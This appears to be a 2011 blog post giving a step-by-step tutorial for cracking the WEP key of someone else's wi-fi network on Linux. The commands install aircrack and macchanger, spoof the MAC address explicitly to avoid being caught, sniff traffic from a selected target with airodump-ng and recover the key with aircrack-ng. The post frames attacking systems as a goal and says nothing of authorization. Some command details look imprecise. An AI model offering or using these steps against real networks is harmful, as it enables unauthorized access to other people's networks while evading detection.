Monday 27 June 2011

Cracking the WEP wi-fi






Hello everyone,
All of us might think that sitting in a room might be the safest thing one can do to avoid death but like death can crawl anywhere so are our systems which are being used in the day to day life.So let us go to the world of hacking. "No system is 100% secure". So, every big or small system has a loophole which is needed to be detected and to be attacked. A lot of upcoming softwares like Ophcrack,John the Ripper are also helpful in breaking passwords of operating systems like Windows.
 So any kind of help regarding hacking are most welcome.

Now coming up with a few examples:
1. Breaking the password of a WEP wi-fi network(using a linux based system):

Steps:
a. Download aircrack and macchanger from the terminal using the commands

sudo apt-get install aircrack
sudo apt-get install macchanger

b. Next open the terminal and with the root priveleges type the commands:

>airmon-ng

It will show your chipset and this process will work with all kinds of chipset but if Atheros and Intel chipset is there, then it is well and good. However others there is no need to worry , still the other chipsets work fine but just need more time to crack the code.
>airmon-ng stop wlan0
>macchanger --mac 00:11:22:33:44:55 wlan0
These two commands will help in creating a new mac address so that there is no chance of being trapped.
Then starting the wlan0
>airmon-ng start wlan0
It will create an interface of mon0 on which packet sniffing can be done.Finally detecting the wi-fi network
>airodump-ng mon0
and then opening a new terminal and selecting the wifi for which we need the password.
>airodump-ng -c <channel_name> -w <any_empty_file> --bssid <bssid_of_network> mon0
Let us assume we had taken the empty file name as "myfile". And wait until you get around data packets of 5000
Finally use the following command to crack the password and yes we have done it
>aircrack-ng myfile-01.cap